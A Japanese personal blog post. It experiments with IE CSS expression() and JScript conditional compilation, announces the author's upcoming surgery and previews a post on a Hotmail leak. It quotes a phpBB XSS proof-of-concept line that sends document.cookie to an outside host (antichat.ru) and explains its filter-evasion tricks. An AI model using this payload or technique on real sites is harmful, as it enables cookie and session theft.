■
■IEについてのてなぐさみ
てなぐさみの目標
Jscriptの条件付コンパイルがスタイル属性から起動されたJscriptでも生きているかどうか確認。謎属性である nonclick属性を勝手に定義し、nonclick属性内に記述されているJscriptをスタイル属性から起動する。結果としてIntel プロセッサ上で実行しているかどうかをブーリアンとして面白がってalertしてみる。
ソースサンプル
<!-- saved from url=(0014)about:internet -->
<script>
/*@cc_on @*/
</script>
<p style="top:expression(eval(this.nonclick));"
nonclick="alert(@_86);this.nonclick=null">
@_86 Intel プロセッサ上で実行していれば真 (boolean)
</p>
結果
ふぅん。(*^_^)
参考文献
- [Full-disclosure] XSS in nested tag in phpbb 2.0.16
- [条件コンパイル] JScript - Dynamic Scripting
- ダイナミックプロパティ expression() のまとめ - Snow*Materia
[Full-disclosure] XSS in nested tag in phpbb 2.0.16のPoC内の記述、sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
で、スペースの代わりに'/**/'を書いているところには正直たまげました。sss属性は作者が勝手に作っているもの。こんなthisの使い方が興味深い。antichatなサーバのアクセスログにcookieが書き込まれるという仕組みなのだけれども、expression(eval())なスタイルでは通常、Jscriptが永遠に起動され続けてしまういや〜んな感じ(同一クッキーが多量にとどいてログあふれするじゃん、むしろDoS?)があるので、作者は、属性内から1回起動したら属性をクリアするという自殺プログラム的な自己言及でもってこれを回避しているのですね。そこまで凝りますか、PoCで。私のようなヘタレではPoCの意図を読むほうが大変なんですけど… =作者様への遠吠え。
■まもなく入院-手術につき
手術予定
入院7/19。全身麻酔の手術なので家族付き添いで7/20に決行。退院まで約2週間IP届きません。それ以上届かなければ麻酔で死んじゃったかもしれません(ほんのわずかな蓋然性ですが全身麻酔でショック症状を示したらそうなるかも。昔、歯科治療(抜歯)で麻酔した時に軽いショックが発生して顔が青ざめたことがあります。ガクガクブルブル。)
手術内容
invertedなpapillomaに対するradicalなもの。MRIやCTスキャンなどではinvertedなpapillomaが既にガン化しているかどうかは判らないので取り敢えず開けてやばそうなところは念のため全部掃除。将来ガン化するかもな所も掃除。うぁぁぁぁん。手術後4日間はよほど親しくない限りお見舞いはお断りしたほうが良いですよ、と看護婦さんのアドバイス。そうだろうなぁ点滴だし絶食しているし術後の痛みで死んでいるらしいし。風呂にはいれないし。顔がパンパンに腫れているらしい。
入院生活
もちこめるような機材を私は持っていません。死ぬほど退屈な予定。なんで2週間もなんだ?どうしてだ?
これを機会に瞑想でもチャレンジして悟りを開くかなぁ(殴)
■次回予告
MSN-Hotmailにおける個人情報漏えいの件
まぁ簡単に言えば受信メッセージ一覧レベルであなたが、いつ。誰からどういう件名でメールを受信していたのか、が判ってしまっていたと言う…